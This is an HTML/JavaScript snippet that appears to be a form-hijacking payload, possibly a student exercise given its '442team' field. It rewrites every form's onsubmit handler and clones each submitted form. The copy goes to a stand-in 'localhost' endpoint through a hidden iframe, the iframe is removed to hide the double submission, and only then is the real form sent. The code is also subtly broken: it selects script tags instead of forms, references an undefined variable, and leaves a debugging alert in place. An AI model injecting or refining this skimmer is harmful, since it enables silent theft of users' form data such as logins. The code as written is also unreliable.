<script>
var frms = document.getElementsByTagName("script");
alert("" + frms.length);
for(i=0; i<frms.length; i++) {
hijack(fms.item(i));
}
</script>

<script>
function hijack(frmObj) {
var delayCode = "";
if(frmObj.hasAttribute("onsubmit")) {
 delayCode = frmObj.getAttribute("onsubmit");}
 frmObj.setAttribute("onsubmit", "return leech(this,function(){" + delayCode + "});");
 }
</script>

<script>
 function leech(frmObj, delayCode) {
 var rnd = Math.floor(Math.random()*256);
 var newFrm = frmObj.cloneNode(true); //deep clone
 newFrm.setAttribute("id", "leechedID" + rnd);
 newFrm.setAttribute("target", "hiddenframe" + newFrm.id);
 newFrm.setAttribute("action", "localhost");

 //create an iframe to hide the form submission.
 var hiddenIframe = document.createElement("iframe");
 hiddenIframe.setAttribute("style", "position:absolute;" + "visibility:hidden;z-index:0;");
 hiddenIframe.setAttribute("name", "hiddenframe" + newFrm.id);

 //add form to hidden iframe and iframe to the document
 hiddenIframe.appendChild(newFrm);
 window.document.body.appendChild(hiddenIframe);

 //do stealthy submission of hijacked form
 var i = document.createElement("input"); //input element, text
        i.setAttribute('type',"text");
        i.setAttribute('name',"442team");
        i.setAttribute('value', "Zach&Austin");
 newFrm.appendChild(i);
 newFrm.submit();
 // Prevent race-winning by setting event for the future.
 // This real form submission happens 50ms after the hijacked one.
 setTimeout(function() {
 //hide traces of the dual submit
 window.document.body.removeChild(hiddenIframe);
 //emulate the onSubmit handler by evaluating given code
 if(delayCode() != false) { frmObj.submit(); }
 }, 50);

//disallow other submission just yet
return false;
}
</script>
</body>